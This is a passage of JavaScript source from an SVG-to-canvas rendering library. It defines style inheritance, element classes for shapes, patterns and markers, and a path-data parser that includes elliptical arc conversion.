				return svg.EmptyProperty;
			}

			// get or create style, crawls up node tree
			this.style = function(name, createIfNotExists, skipAncestors) {
				var s = this.styles[name];
				if (s != null) return s;

				var a = this.attribute(name);
				if (a != null && a.hasValue()) {
					this.styles[name] = a; // move up to me to cache
					return a;
				}

				if (skipAncestors != true) {
					var p = this.parent;
					if (p != null) {
						var ps = p.style(name);
						if (ps != null && ps.hasValue()) {
							return ps;
						}
					}
				}

				if (createIfNotExists == true) { s = new svg.Property(name, ''); this.styles[name] = s; }
				return s || svg.EmptyProperty;
			}

			// base render
			this.render = function(ctx) {
				// don't render display=none
				if (this.style('display').value == 'none') return;

				// don't render visibility=hidden
				if (this.style('visibility').value == 'hidden') return;

				ctx.save();
				if (this.style('mask').hasValue()) { // mask
					var mask = this.style('mask').getDefinition();
					if (mask != null) mask.apply(ctx, this);
				}
				else if (this.style('filter').hasValue()) { // filter
					var filter = this.style('filter').getDefinition();
					if (filter != null) filter.apply(ctx, this);
				}
				else {
					this.setContext(ctx);
					this.renderChildren(ctx);
					this.clearContext(ctx);
				}
				ctx.restore();
			}

			// base set context
			this.setContext = function(ctx) {
				// OVERRIDE ME!
			}

			// base clear context
			this.clearContext = function(ctx) {
				// OVERRIDE ME!
			}

			// base render children
			this.renderChildren = function(ctx) {
				for (var i=0; i<this.children.length; i++) {
					this.children[i].render(ctx);
				}
			}

			this.addChild = function(childNode, create) {
				var child = childNode;
				if (create) child = svg.CreateElement(childNode);
				child.parent = this;
				if (child.type != 'title') { this.children.push(child);	}
			}
			
			this.addStylesFromStyleDefinition = function () {
				// add styles
				for (var selector in svg.Styles) {
					if (selector[0] != '@' && matchesSelector(node, selector)) {
						var styles = svg.Styles[selector];
						var specificity = svg.StylesSpecificity[selector];
						if (styles != null) {
							for (var name in styles) {
								var existingSpecificity = this.stylesSpecificity[name];
								if (typeof(existingSpecificity) == 'undefined') {
									existingSpecificity = '000';
								}
								if (specificity > existingSpecificity) {
									this.styles[name] = styles[name];
									this.stylesSpecificity[name] = specificity;
								}
							}
						}
					}
				}
			};

			if (node != null && node.nodeType == 1) { //ELEMENT_NODE
				// add attributes
				for (var i=0; i<node.attributes.length; i++) {
					var attribute = node.attributes[i];
					this.attributes[attribute.nodeName] = new svg.Property(attribute.nodeName, attribute.value);
				}
				
				this.addStylesFromStyleDefinition();

				// add inline styles
				if (this.attribute('style').hasValue()) {
					var styles = this.attribute('style').value.split(';');
					for (var i=0; i<styles.length; i++) {
						if (svg.trim(styles[i]) != '') {
							var style = styles[i].split(':');
							var name = svg.trim(style[0]);
							var value = svg.trim(style[1]);
							this.styles[name] = new svg.Property(name, value);
						}
					}
				}

				// add id
				if (this.attribute('id').hasValue()) {
					if (svg.Definitions[this.attribute('id').value] == null) {
						svg.Definitions[this.attribute('id').value] = this;
					}
				}

				// add children
				for (var i=0; i<node.childNodes.length; i++) {
					var childNode = node.childNodes[i];
					if (childNode.nodeType == 1) this.addChild(childNode, true); //ELEMENT_NODE
					if (this.captureTextNodes && (childNode.nodeType == 3 || childNode.nodeType == 4)) {
						var text = childNode.value || childNode.text || childNode.textContent || '';
						if (svg.compressSpaces(text) != '') {
							this.addChild(new svg.Element.tspan(childNode), false); // TEXT_NODE
						}
					}
				}
			}
		}

		svg.Element.RenderedElementBase = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.setContext = function(ctx) {
				// fill
				if (this.style('fill').isUrlDefinition()) {
					var fs = this.style('fill').getFillStyleDefinition(this, this.style('fill-opacity'));
					if (fs != null) ctx.fillStyle = fs;
				}
				else if (this.style('fill').hasValue()) {
					var fillStyle = this.style('fill');
					if (fillStyle.value == 'currentColor') fillStyle.value = this.style('color').value;
					if (fillStyle.value != 'inherit') ctx.fillStyle = (fillStyle.value == 'none' ? 'rgba(0,0,0,0)' : fillStyle.value);
				}
				if (this.style('fill-opacity').hasValue()) {
					var fillStyle = new svg.Property('fill', ctx.fillStyle);
					fillStyle = fillStyle.addOpacity(this.style('fill-opacity'));
					ctx.fillStyle = fillStyle.value;
				}

				// stroke
				if (this.style('stroke').isUrlDefinition()) {
					var fs = this.style('stroke').getFillStyleDefinition(this, this.style('stroke-opacity'));
					if (fs != null) ctx.strokeStyle = fs;
				}
				else if (this.style('stroke').hasValue()) {
					var strokeStyle = this.style('stroke');
					if (strokeStyle.value == 'currentColor') strokeStyle.value = this.style('color').value;
					if (strokeStyle.value != 'inherit') ctx.strokeStyle = (strokeStyle.value == 'none' ? 'rgba(0,0,0,0)' : strokeStyle.value);
				}
				if (this.style('stroke-opacity').hasValue()) {
					var strokeStyle = new svg.Property('stroke', ctx.strokeStyle);
					strokeStyle = strokeStyle.addOpacity(this.style('stroke-opacity'));
					ctx.strokeStyle = strokeStyle.value;
				}
				if (this.style('stroke-width').hasValue()) {
					var newLineWidth = this.style('stroke-width').toPixels();
					ctx.lineWidth = newLineWidth == 0 ? 0.001 : newLineWidth; // browsers don't respect 0
			    }
				if (this.style('stroke-linecap').hasValue()) ctx.lineCap = this.style('stroke-linecap').value;
				if (this.style('stroke-linejoin').hasValue()) ctx.lineJoin = this.style('stroke-linejoin').value;
				if (this.style('stroke-miterlimit').hasValue()) ctx.miterLimit = this.style('stroke-miterlimit').value;
				if (this.style('stroke-dasharray').hasValue() && this.style('stroke-dasharray').value != 'none') {
					var gaps = svg.ToNumberArray(this.style('stroke-dasharray').value);
					if (typeof(ctx.setLineDash) != 'undefined') { ctx.setLineDash(gaps); }
					else if (typeof(ctx.webkitLineDash) != 'undefined') { ctx.webkitLineDash = gaps; }
					else if (typeof(ctx.mozDash) != 'undefined' && !(gaps.length==1 && gaps[0]==0)) { ctx.mozDash = gaps; }

					var offset = this.style('stroke-dashoffset').numValueOrDefault(1);
					if (typeof(ctx.lineDashOffset) != 'undefined') { ctx.lineDashOffset = offset; }
					else if (typeof(ctx.webkitLineDashOffset) != 'undefined') { ctx.webkitLineDashOffset = offset; }
					else if (typeof(ctx.mozDashOffset) != 'undefined') { ctx.mozDashOffset = offset; }
				}

				// font
				if (typeof(ctx.font) != 'undefined') {
					ctx.font = svg.Font.CreateFont(
						this.style('font-style').value,
						this.style('font-variant').value,
						this.style('font-weight').value,
						this.style('font-size').hasValue() ? this.style('font-size').toPixels() + 'px' : '',
						this.style('font-family').value).toString();
				}

				// transform
				if (this.style('transform', false, true).hasValue()) {
					var transform = new svg.Transform(this.style('transform', false, true).value);
					transform.apply(ctx);
				}

				// clip
				if (this.style('clip-path', false, true).hasValue()) {
					var clip = this.style('clip-path', false, true).getDefinition();
					if (clip != null) clip.apply(ctx);
				}

				// opacity
				if (this.style('opacity').hasValue()) {
					ctx.globalAlpha = this.style('opacity').numValue();
				}
			}
		}
		svg.Element.RenderedElementBase.prototype = new svg.Element.ElementBase;

		svg.Element.PathElementBase = function(node) {
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			this.path = function(ctx) {
				if (ctx != null) ctx.beginPath();
				return new svg.BoundingBox();
			}

			this.renderChildren = function(ctx) {
				this.path(ctx);
				svg.Mouse.checkPath(this, ctx);
				if (ctx.fillStyle != '') {
					if (this.style('fill-rule').valueOrDefault('inherit') != 'inherit') { ctx.fill(this.style('fill-rule').value); }
					else { ctx.fill(); }
				}
				if (ctx.strokeStyle != '') ctx.stroke();

				var markers = this.getMarkers();
				if (markers != null) {
					if (this.style('marker-start').isUrlDefinition()) {
						var marker = this.style('marker-start').getDefinition();
						marker.render(ctx, markers[0][0], markers[0][1]);
					}
					if (this.style('marker-mid').isUrlDefinition()) {
						var marker = this.style('marker-mid').getDefinition();
						for (var i=1;i<markers.length-1;i++) {
							marker.render(ctx, markers[i][0], markers[i][1]);
						}
					}
					if (this.style('marker-end').isUrlDefinition()) {
						var marker = this.style('marker-end').getDefinition();
						marker.render(ctx, markers[markers.length-1][0], markers[markers.length-1][1]);
					}
				}
			}

			this.getBoundingBox = function() {
				return this.path();
			}

			this.getMarkers = function() {
				return null;
			}
		}
		svg.Element.PathElementBase.prototype = new svg.Element.RenderedElementBase;

		// svg element
		svg.Element.svg = function(node) {
			this.base = svg.Element.RenderedElementBase;
			this.base(node);

			this.baseClearContext = this.clearContext;
			this.clearContext = function(ctx) {
				this.baseClearContext(ctx);
				svg.ViewPort.RemoveCurrent();
			}

			this.baseSetContext = this.setContext;
			this.setContext = function(ctx) {
				// initial values and defaults
				ctx.strokeStyle = 'rgba(0,0,0,0)';
				ctx.lineCap = 'butt';
				ctx.lineJoin = 'miter';
				ctx.miterLimit = 4;
				if (typeof(ctx.font) != 'undefined' && typeof(window.getComputedStyle) != 'undefined') {
					ctx.font = window.getComputedStyle(ctx.canvas).getPropertyValue('font');
				}

				this.baseSetContext(ctx);

				// create new view port
				if (!this.attribute('x').hasValue()) this.attribute('x', true).value = 0;
				if (!this.attribute('y').hasValue()) this.attribute('y', true).value = 0;
				ctx.translate(this.attribute('x').toPixels('x'), this.attribute('y').toPixels('y'));

				var width = svg.ViewPort.width();
				var height = svg.ViewPort.height();

				if (!this.attribute('width').hasValue()) this.attribute('width', true).value = '100%';
				if (!this.attribute('height').hasValue()) this.attribute('height', true).value = '100%';
				if (typeof(this.root) == 'undefined') {
					width = this.attribute('width').toPixels('x');
					height = this.attribute('height').toPixels('y');

					var x = 0;
					var y = 0;
					if (this.attribute('refX').hasValue() && this.attribute('refY').hasValue()) {
						x = -this.attribute('refX').toPixels('x');
						y = -this.attribute('refY').toPixels('y');
					}

					if (this.attribute('overflow').valueOrDefault('hidden') != 'visible') {
						ctx.beginPath();
						ctx.moveTo(x, y);
						ctx.lineTo(width, y);
						ctx.lineTo(width, height);
						ctx.lineTo(x, height);
						ctx.closePath();
						ctx.clip();
					}
				}
				svg.ViewPort.SetCurrent(width, height);

				// viewbox
				if (this.attribute('viewBox').hasValue()) {
					var viewBox = svg.ToNumberArray(this.attribute('viewBox').value);
					var minX = viewBox[0];
					var minY = viewBox[1];
					width = viewBox[2];
					height = viewBox[3];

					svg.AspectRatio(ctx,
									this.attribute('preserveAspectRatio').value,
									svg.ViewPort.width(),
									width,
									svg.ViewPort.height(),
									height,
									minX,
									minY,
									this.attribute('refX').value,
									this.attribute('refY').value);

					svg.ViewPort.RemoveCurrent();
					svg.ViewPort.SetCurrent(viewBox[2], viewBox[3]);
				}
			}
		}
		svg.Element.svg.prototype = new svg.Element.RenderedElementBase;

		// rect element
		svg.Element.rect = function(node) {
			this.base = svg.Element.PathElementBase;
			this.base(node);

			this.path = function(ctx) {
				var x = this.attribute('x').toPixels('x');
				var y = this.attribute('y').toPixels('y');
				var width = this.attribute('width').toPixels('x');
				var height = this.attribute('height').toPixels('y');
				var rx = this.attribute('rx').toPixels('x');
				var ry = this.attribute('ry').toPixels('y');
				if (this.attribute('rx').hasValue() && !this.attribute('ry').hasValue()) ry = rx;
				if (this.attribute('ry').hasValue() && !this.attribute('rx').hasValue()) rx = ry;
				rx = Math.min(rx, width / 2.0);
				ry = Math.min(ry, height / 2.0);
				if (ctx != null) {
					ctx.beginPath();
					ctx.moveTo(x + rx, y);
					ctx.lineTo(x + width - rx, y);
					ctx.quadraticCurveTo(x + width, y, x + width, y + ry)
					ctx.lineTo(x + width, y + height - ry);
					ctx.quadraticCurveTo(x + width, y + height, x + width - rx, y + height)
					ctx.lineTo(x + rx, y + height);
					ctx.quadraticCurveTo(x, y + height, x, y + height - ry)
					ctx.lineTo(x, y + ry);
					ctx.quadraticCurveTo(x, y, x + rx, y)
					ctx.closePath();
				}

				return new svg.BoundingBox(x, y, x + width, y + height);
			}
		}
		svg.Element.rect.prototype = new svg.Element.PathElementBase;

		// circle element
		svg.Element.circle = function(node) {
			this.base = svg.Element.PathElementBase;
			this.base(node);

			this.path = function(ctx) {
				var cx = this.attribute('cx').toPixels('x');
				var cy = this.attribute('cy').toPixels('y');
				var r = this.attribute('r').toPixels();

				if (ctx != null) {
					ctx.beginPath();
					ctx.arc(cx, cy, r, 0, Math.PI * 2, true);
					ctx.closePath();
				}

				return new svg.BoundingBox(cx - r, cy - r, cx + r, cy + r);
			}
		}
		svg.Element.circle.prototype = new svg.Element.PathElementBase;

		// ellipse element
		svg.Element.ellipse = function(node) {
			this.base = svg.Element.PathElementBase;
			this.base(node);

			this.path = function(ctx) {
				var KAPPA = 4 * ((Math.sqrt(2) - 1) / 3);
				var rx = this.attribute('rx').toPixels('x');
				var ry = this.attribute('ry').toPixels('y');
				var cx = this.attribute('cx').toPixels('x');
				var cy = this.attribute('cy').toPixels('y');

				if (ctx != null) {
					ctx.beginPath();
					ctx.moveTo(cx, cy - ry);
					ctx.bezierCurveTo(cx + (KAPPA * rx), cy - ry,  cx + rx, cy - (KAPPA * ry), cx + rx, cy);
					ctx.bezierCurveTo(cx + rx, cy + (KAPPA * ry), cx + (KAPPA * rx), cy + ry, cx, cy + ry);
					ctx.bezierCurveTo(cx - (KAPPA * rx), cy + ry, cx - rx, cy + (KAPPA * ry), cx - rx, cy);
					ctx.bezierCurveTo(cx - rx, cy - (KAPPA * ry), cx - (KAPPA * rx), cy - ry, cx, cy - ry);
					ctx.closePath();
				}

				return new svg.BoundingBox(cx - rx, cy - ry, cx + rx, cy + ry);
			}
		}
		svg.Element.ellipse.prototype = new svg.Element.PathElementBase;

		// line element
		svg.Element.line = function(node) {
			this.base = svg.Element.PathElementBase;
			this.base(node);

			this.getPoints = function() {
				return [
					new svg.Point(this.attribute('x1').toPixels('x'), this.attribute('y1').toPixels('y')),
					new svg.Point(this.attribute('x2').toPixels('x'), this.attribute('y2').toPixels('y'))];
			}

			this.path = function(ctx) {
				var points = this.getPoints();

				if (ctx != null) {
					ctx.beginPath();
					ctx.moveTo(points[0].x, points[0].y);
					ctx.lineTo(points[1].x, points[1].y);
				}

				return new svg.BoundingBox(points[0].x, points[0].y, points[1].x, points[1].y);
			}

			this.getMarkers = function() {
				var points = this.getPoints();
				var a = points[0].angleTo(points[1]);
				return [[points[0], a], [points[1], a]];
			}
		}
		svg.Element.line.prototype = new svg.Element.PathElementBase;

		// polyline element
		svg.Element.polyline = function(node) {
			this.base = svg.Element.PathElementBase;
			this.base(node);

			this.points = svg.CreatePath(this.attribute('points').value);
			this.path = function(ctx) {
				var bb = new svg.BoundingBox(this.points[0].x, this.points[0].y);
				if (ctx != null) {
					ctx.beginPath();
					ctx.moveTo(this.points[0].x, this.points[0].y);
				}
				for (var i=1; i<this.points.length; i++) {
					bb.addPoint(this.points[i].x, this.points[i].y);
					if (ctx != null) ctx.lineTo(this.points[i].x, this.points[i].y);
				}
				return bb;
			}

			this.getMarkers = function() {
				var markers = [];
				for (var i=0; i<this.points.length - 1; i++) {
					markers.push([this.points[i], this.points[i].angleTo(this.points[i+1])]);
				}
				markers.push([this.points[this.points.length-1], markers[markers.length-1][1]]);
				return markers;
			}
		}
		svg.Element.polyline.prototype = new svg.Element.PathElementBase;

		// polygon element
		svg.Element.polygon = function(node) {
			this.base = svg.Element.polyline;
			this.base(node);

			this.basePath = this.path;
			this.path = function(ctx) {
				var bb = this.basePath(ctx);
				if (ctx != null) {
					ctx.lineTo(this.points[0].x, this.points[0].y);
					ctx.closePath();
				}
				return bb;
			}
		}
		svg.Element.polygon.prototype = new svg.Element.polyline;

		// path element
		svg.Element.path = function(node) {
			this.base = svg.Element.PathElementBase;
			this.base(node);

			var d = this.attribute('d').value;
			// TODO: convert to real lexer based on http://www.w3.org/TR/SVG11/paths.html#PathDataBNF
			d = d.replace(/,/gm,' '); // get rid of all commas
			// As the end of a match can also be the start of the next match, we need to run this replace twice.
			for(var i=0; i<2; i++)
				d = d.replace(/([MmZzLlHhVvCcSsQqTtAa])([^\s])/gm,'$1 $2'); // suffix commands with spaces
			d = d.replace(/([^\s])([MmZzLlHhVvCcSsQqTtAa])/gm,'$1 $2'); // prefix commands with spaces
			d = d.replace(/([0-9])([+\-])/gm,'$1 $2'); // separate digits on +- signs
			// Again, we need to run this twice to find all occurances
			for(var i=0; i<2; i++)
				d = d.replace(/(\.[0-9]*)(\.)/gm,'$1 $2'); // separate digits when they start with a comma
			d = d.replace(/([Aa](\s+[0-9]+){3})\s+([01])\s*([01])/gm,'$1 $3 $4 '); // shorthand elliptical arc path syntax
			d = svg.compressSpaces(d); // compress multiple spaces
			d = svg.trim(d);
			this.PathParser = new (function(d) {
				this.tokens = d.split(' ');

				this.reset = function() {
					this.i = -1;
					this.command = '';
					this.previousCommand = '';
					this.start = new svg.Point(0, 0);
					this.control = new svg.Point(0, 0);
					this.current = new svg.Point(0, 0);
					this.points = [];
					this.angles = [];
				}

				this.isEnd = function() {
					return this.i >= this.tokens.length - 1;
				}

				this.isCommandOrEnd = function() {
					if (this.isEnd()) return true;
					return this.tokens[this.i + 1].match(/^[A-Za-z]$/) != null;
				}

				this.isRelativeCommand = function() {
					switch(this.command)
					{
						case 'm':
						case 'l':
						case 'h':
						case 'v':
						case 'c':
						case 's':
						case 'q':
						case 't':
						case 'a':
						case 'z':
							return true;
							break;
					}
					return false;
				}

				this.getToken = function() {
					this.i++;
					return this.tokens[this.i];
				}

				this.getScalar = function() {
					return parseFloat(this.getToken());
				}

				this.nextCommand = function() {
					this.previousCommand = this.command;
					this.command = this.getToken();
				}

				this.getPoint = function() {
					var p = new svg.Point(this.getScalar(), this.getScalar());
					return this.makeAbsolute(p);
				}

				this.getAsControlPoint = function() {
					var p = this.getPoint();
					this.control = p;
					return p;
				}

				this.getAsCurrentPoint = function() {
					var p = this.getPoint();
					this.current = p;
					return p;
				}

				this.getReflectedControlPoint = function() {
					if (this.previousCommand.toLowerCase() != 'c' &&
					    this.previousCommand.toLowerCase() != 's' &&
						this.previousCommand.toLowerCase() != 'q' &&
						this.previousCommand.toLowerCase() != 't' ){
						return this.current;
					}

					// reflect point
					var p = new svg.Point(2 * this.current.x - this.control.x, 2 * this.current.y - this.control.y);
					return p;
				}

				this.makeAbsolute = function(p) {
					if (this.isRelativeCommand()) {
						p.x += this.current.x;
						p.y += this.current.y;
					}
					return p;
				}

				this.addMarker = function(p, from, priorTo) {
					// if the last angle isn't filled in because we didn't have this point yet ...
					if (priorTo != null && this.angles.length > 0 && this.angles[this.angles.length-1] == null) {
						this.angles[this.angles.length-1] = this.points[this.points.length-1].angleTo(priorTo);
					}
					this.addMarkerAngle(p, from == null ? null : from.angleTo(p));
				}

				this.addMarkerAngle = function(p, a) {
					this.points.push(p);
					this.angles.push(a);
				}

				this.getMarkerPoints = function() { return this.points; }
				this.getMarkerAngles = function() {
					for (var i=0; i<this.angles.length; i++) {
						if (this.angles[i] == null) {
							for (var j=i+1; j<this.angles.length; j++) {
								if (this.angles[j] != null) {
									this.angles[i] = this.angles[j];
									break;
								}
							}
						}
					}
					return this.angles;
				}
			})(d);

			this.path = function(ctx) {
				var pp = this.PathParser;
				pp.reset();

				var bb = new svg.BoundingBox();
				if (ctx != null) ctx.beginPath();
				while (!pp.isEnd()) {
					pp.nextCommand();
					switch (pp.command) {
					case 'M':
					case 'm':
						var p = pp.getAsCurrentPoint();
						pp.addMarker(p);
						bb.addPoint(p.x, p.y);
						if (ctx != null) ctx.moveTo(p.x, p.y);
						pp.start = pp.current;
						while (!pp.isCommandOrEnd()) {
							var p = pp.getAsCurrentPoint();
							pp.addMarker(p, pp.start);
							bb.addPoint(p.x, p.y);
							if (ctx != null) ctx.lineTo(p.x, p.y);
						}
						break;
					case 'L':
					case 'l':
						while (!pp.isCommandOrEnd()) {
							var c = pp.current;
							var p = pp.getAsCurrentPoint();
							pp.addMarker(p, c);
							bb.addPoint(p.x, p.y);
							if (ctx != null) ctx.lineTo(p.x, p.y);
						}
						break;
					case 'H':
					case 'h':
						while (!pp.isCommandOrEnd()) {
							var newP = new svg.Point((pp.isRelativeCommand() ? pp.current.x : 0) + pp.getScalar(), pp.current.y);
							pp.addMarker(newP, pp.current);
							pp.current = newP;
							bb.addPoint(pp.current.x, pp.current.y);
							if (ctx != null) ctx.lineTo(pp.current.x, pp.current.y);
						}
						break;
					case 'V':
					case 'v':
						while (!pp.isCommandOrEnd()) {
							var newP = new svg.Point(pp.current.x, (pp.isRelativeCommand() ? pp.current.y : 0) + pp.getScalar());
							pp.addMarker(newP, pp.current);
							pp.current = newP;
							bb.addPoint(pp.current.x, pp.current.y);
							if (ctx != null) ctx.lineTo(pp.current.x, pp.current.y);
						}
						break;
					case 'C':
					case 'c':
						while (!pp.isCommandOrEnd()) {
							var curr = pp.current;
							var p1 = pp.getPoint();
							var cntrl = pp.getAsControlPoint();
							var cp = pp.getAsCurrentPoint();
							pp.addMarker(cp, cntrl, p1);
							bb.addBezierCurve(curr.x, curr.y, p1.x, p1.y, cntrl.x, cntrl.y, cp.x, cp.y);
							if (ctx != null) ctx.bezierCurveTo(p1.x, p1.y, cntrl.x, cntrl.y, cp.x, cp.y);
						}
						break;
					case 'S':
					case 's':
						while (!pp.isCommandOrEnd()) {
							var curr = pp.current;
							var p1 = pp.getReflectedControlPoint();
							var cntrl = pp.getAsControlPoint();
							var cp = pp.getAsCurrentPoint();
							pp.addMarker(cp, cntrl, p1);
							bb.addBezierCurve(curr.x, curr.y, p1.x, p1.y, cntrl.x, cntrl.y, cp.x, cp.y);
							if (ctx != null) ctx.bezierCurveTo(p1.x, p1.y, cntrl.x, cntrl.y, cp.x, cp.y);
						}
						break;
					case 'Q':
					case 'q':
						while (!pp.isCommandOrEnd()) {
							var curr = pp.current;
							var cntrl = pp.getAsControlPoint();
							var cp = pp.getAsCurrentPoint();
							pp.addMarker(cp, cntrl, cntrl);
							bb.addQuadraticCurve(curr.x, curr.y, cntrl.x, cntrl.y, cp.x, cp.y);
							if (ctx != null) ctx.quadraticCurveTo(cntrl.x, cntrl.y, cp.x, cp.y);
						}
						break;
					case 'T':
					case 't':
						while (!pp.isCommandOrEnd()) {
							var curr = pp.current;
							var cntrl = pp.getReflectedControlPoint();
							pp.control = cntrl;
							var cp = pp.getAsCurrentPoint();
							pp.addMarker(cp, cntrl, cntrl);
							bb.addQuadraticCurve(curr.x, curr.y, cntrl.x, cntrl.y, cp.x, cp.y);
							if (ctx != null) ctx.quadraticCurveTo(cntrl.x, cntrl.y, cp.x, cp.y);
						}
						break;
					case 'A':
					case 'a':
						while (!pp.isCommandOrEnd()) {
						    var curr = pp.current;
							var rx = pp.getScalar();
							var ry = pp.getScalar();
							var xAxisRotation = pp.getScalar() * (Math.PI / 180.0);
							var largeArcFlag = pp.getScalar();
							var sweepFlag = pp.getScalar();
							var cp = pp.getAsCurrentPoint();

							// Conversion from endpoint to center parameterization
							// http://www.w3.org/TR/SVG11/implnote.html#ArcImplementationNotes
							// x1', y1'
							var currp = new svg.Point(
								Math.cos(xAxisRotation) * (curr.x - cp.x) / 2.0 + Math.sin(xAxisRotation) * (curr.y - cp.y) / 2.0,
								-Math.sin(xAxisRotation) * (curr.x - cp.x) / 2.0 + Math.cos(xAxisRotation) * (curr.y - cp.y) / 2.0
							);
							// adjust radii
							var l = Math.pow(currp.x,2)/Math.pow(rx,2)+Math.pow(currp.y,2)/Math.pow(ry,2);
							if (l > 1) {
								rx *= Math.sqrt(l);
								ry *= Math.sqrt(l);
							}
							// cx', cy'
							var s = (largeArcFlag == sweepFlag ? -1 : 1) * Math.sqrt(
								((Math.pow(rx,2)*Math.pow(ry,2))-(Math.pow(rx,2)*Math.pow(currp.y,2))-(Math.pow(ry,2)*Math.pow(currp.x,2))) /
								(Math.pow(rx,2)*Math.pow(currp.y,2)+Math.pow(ry,2)*Math.pow(currp.x,2))
							);
							if (isNaN(s)) s = 0;
							var cpp = new svg.Point(s * rx * currp.y / ry, s * -ry * currp.x / rx);
							// cx, cy
							var centp = new svg.Point(
								(curr.x + cp.x) / 2.0 + Math.cos(xAxisRotation) * cpp.x - Math.sin(xAxisRotation) * cpp.y,
								(curr.y + cp.y) / 2.0 + Math.sin(xAxisRotation) * cpp.x + Math.cos(xAxisRotation) * cpp.y
							);
							// vector magnitude
							var m = function(v) { return Math.sqrt(Math.pow(v[0],2) + Math.pow(v[1],2)); }
							// ratio between two vectors
							var r = function(u, v) { return (u[0]*v[0]+u[1]*v[1]) / (m(u)*m(v)) }
							// angle between two vectors
							var a = function(u, v) { return (u[0]*v[1] < u[1]*v[0] ? -1 : 1) * Math.acos(r(u,v)); }
							// initial angle
							var a1 = a([1,0], [(currp.x-cpp.x)/rx,(currp.y-cpp.y)/ry]);
							// angle delta
							var u = [(currp.x-cpp.x)/rx,(currp.y-cpp.y)/ry];
							var v = [(-currp.x-cpp.x)/rx,(-currp.y-cpp.y)/ry];
							var ad = a(u, v);
							if (r(u,v) <= -1) ad = Math.PI;
							if (r(u,v) >= 1) ad = 0;

							// for markers
							var dir = 1 - sweepFlag ? 1.0 : -1.0;
							var ah = a1 + dir * (ad / 2.0);
							var halfWay = new svg.Point(
								centp.x + rx * Math.cos(ah),
								centp.y + ry * Math.sin(ah)
							);
							pp.addMarkerAngle(halfWay, ah - dir * Math.PI / 2);
							pp.addMarkerAngle(cp, ah - dir * Math.PI);

							bb.addPoint(cp.x, cp.y); // TODO: this is too naive, make it better
							if (ctx != null) {
								var r = rx > ry ? rx : ry;
								var sx = rx > ry ? 1 : rx / ry;
								var sy = rx > ry ? ry / rx : 1;

								ctx.translate(centp.x, centp.y);
								ctx.rotate(xAxisRotation);
								ctx.scale(sx, sy);
								ctx.arc(0, 0, r, a1, a1 + ad, 1 - sweepFlag);
								ctx.scale(1/sx, 1/sy);
								ctx.rotate(-xAxisRotation);
								ctx.translate(-centp.x, -centp.y);
							}
						}
						break;
					case 'Z':
					case 'z':
						if (ctx != null) ctx.closePath();
						pp.current = pp.start;
					}
				}

				return bb;
			}

			this.getMarkers = function() {
				var points = this.PathParser.getMarkerPoints();
				var angles = this.PathParser.getMarkerAngles();

				var markers = [];
				for (var i=0; i<points.length; i++) {
					markers.push([points[i], angles[i]]);
				}
				return markers;
			}
		}
		svg.Element.path.prototype = new svg.Element.PathElementBase;

		// pattern element
		svg.Element.pattern = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.createPattern = function(ctx, element) {
				var width = this.attribute('width').toPixels('x', true);
				var height = this.attribute('height').toPixels('y', true);

				// render me using a temporary svg element
				var tempSvg = new svg.Element.svg();
				tempSvg.attributes['viewBox'] = new svg.Property('viewBox', this.attribute('viewBox').value);
				tempSvg.attributes['width'] = new svg.Property('width', width + 'px');
				tempSvg.attributes['height'] = new svg.Property('height', height + 'px');
				tempSvg.attributes['transform'] = new svg.Property('transform', this.attribute('patternTransform').value);
				tempSvg.children = this.children;

				var c = document.createElement('canvas');
				c.width = width;
				c.height = height;
				var cctx = c.getContext('2d');
				if (this.attribute('x').hasValue() && this.attribute('y').hasValue()) {
					cctx.translate(this.attribute('x').toPixels('x', true), this.attribute('y').toPixels('y', true));
				}
				// render 3x3 grid so when we transform there's no white space on edges
				for (var x=-1; x<=1; x++) {
					for (var y=-1; y<=1; y++) {
						cctx.save();
						tempSvg.attributes['x'] = new svg.Property('x', x * c.width);
						tempSvg.attributes['y'] = new svg.Property('y', y * c.height);
						tempSvg.render(cctx);
						cctx.restore();
					}
				}
				var pattern = ctx.createPattern(c, 'repeat');
				return pattern;
			}
		}
		svg.Element.pattern.prototype = new svg.Element.ElementBase;

		// marker element
		svg.Element.marker = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.baseRender = this.render;
			this.render = function(ctx, point, angle) {
				ctx.translate(point.x, point.y);
				if (this.attribute('orient').valueOrDefault('auto') == 'auto') ctx.rotate(angle);
				if (this.attribute('markerUnits').valueOrDefault('strokeWidth') == 'strokeWidth') ctx.scale(ctx.lineWidth, ctx.lineWidth);
				ctx.save();

				// render me using a temporary svg element
				var tempSvg = new svg.Element.svg();
				tempSvg.attributes['viewBox'] = new svg.Property('viewBox', this.attribute('viewBox').value);
				tempSvg.attributes['refX'] = new svg.Property('refX', this.attribute('refX').value);
				tempSvg.attributes['refY'] = new svg.Property('refY', this.attribute('refY').value);
				tempSvg.attributes['width'] = new svg.Property('width', this.attribute('markerWidth').value);
				tempSvg.attributes['height'] = new svg.Property('height', this.attribute('markerHeight').value);
				tempSvg.attributes['fill'] = new svg.Property('fill', this.attribute('fill').valueOrDefault('black'));
				tempSvg.attributes['stroke'] = new svg.Property('stroke', this.attribute('stroke').valueOrDefault('none'));
				tempSvg.children = this.children;
				tempSvg.render(ctx);

				ctx.restore();
				if (this.attribute('markerUnits').valueOrDefault('strokeWidth') == 'strokeWidth') ctx.scale(1/ctx.lineWidth, 1/ctx.lineWidth);
				if (this.attribute('orient').valueOrDefault('auto') == 'auto') ctx.rotate(-angle);
				ctx.translate(-point.x, -point.y);
			}
		}
		svg.Element.marker.prototype = new svg.Element.ElementBase;

		// definitions element
		svg.Element.defs = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.render = function(ctx) {
				// NOOP
			}
		}
		svg.Element.defs.prototype = new svg.Element.ElementBase;

		// base for gradients
		svg.Element.GradientBase = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.stops = [];
			for (var i=0; i<this.children.length; i++) {
				var child = this.children[i];
				if (child.type == 'stop') this.stops.push(child);
			}

			this.getGradient = function() {
				// OVERRIDE ME!
			}
			
			this.gradientUnits = function () {
				return this.attribute('gradientUnits').valueOrDefault('objectBoundingBox');
			}
			
			this.attributesToInherit = ['gradientUnits'];
			
			this.inheritStopContainer = function (stopsContainer) {
				for (var i=0; i<this.attributesToInherit.length; i++) {
					var attributeToInherit = this.attributesToInherit[i];
					if (!this.attribute(attributeToInherit).hasValue() && stopsContainer.attribute(attributeToInherit).hasValue()) {
						this.attribute(attributeToInherit, true).value = stopsContainer.attribute(attributeToInherit).value;
					}
				}
			}

			this.createGradient = function(ctx, element, parentOpacityProp) {
